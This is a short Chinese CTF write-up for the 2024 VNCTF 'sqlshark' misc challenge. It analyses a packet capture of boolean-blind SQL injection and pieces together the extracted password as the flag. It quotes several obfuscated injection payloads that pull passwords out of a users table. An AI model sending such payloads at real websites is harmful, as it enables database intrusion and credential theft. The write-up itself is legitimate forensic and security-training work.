2024 VNCTF----misc---sqlshark sql盲注+流量分析

  • 开发
  • 54

流量分析 

wireshark

可以看到很多

any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 1 fOr 1))))in(80))),1,0))#   P
any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 1 fOr 1))))in(104))),1,0))# h
any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 1 fOr 1))))in(92))),1,0))# \ *

这是sql盲注, 从1到14可以看出flag有14位,每位只取最后成功的一个转码

最后拼成admin_p@ssw0rd 

阅读全部

相关推荐

  4. SQL漏洞

    2024-02-20 02:36:02       39 阅读
  5. sql<span style='color:red;'>盲</span><span style='color:red;'>注</span>

    sql

    2024-02-20 02:36:02      27 阅读

  8. 布尔+时间+堆叠注入

    2024-02-20 02:36:02       46 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-02-20 02:36:02       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-02-20 02:36:02       100 阅读

  9. 在Django里面运行非项目文件

    2024-02-20 02:36:02       82 阅读

  19. Python语言-面向对象

    2024-02-20 02:36:02       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-02-20 02:36:02       85 阅读

热门阅读

  1. MySQL的 4 种连接查询

    2024-02-20 02:36:02       41 阅读

  4. 【C++精简版回顾】1.命名空间2.标准输出3.内联函数与函数重载

    2024-02-20 02:36:02       54 阅读

  13. ChatGPT魔法2:两大准则

    2024-02-20 02:36:02       51 阅读

  16. MySQL全量备份

    2024-02-20 02:36:02       39 阅读

  23. linux查看磁盘占用命令

    2024-02-20 02:36:02       45 阅读

  24. 【LeetCode每日一题】单调栈 901股票价格跨度

    2024-02-20 02:36:02       61 阅读

  27. 【Docker】dockerfile学习

    2024-02-20 02:36:02       49 阅读

  28. 备战蓝桥杯 Day6(学习动态规划)

    2024-02-20 02:36:02       52 阅读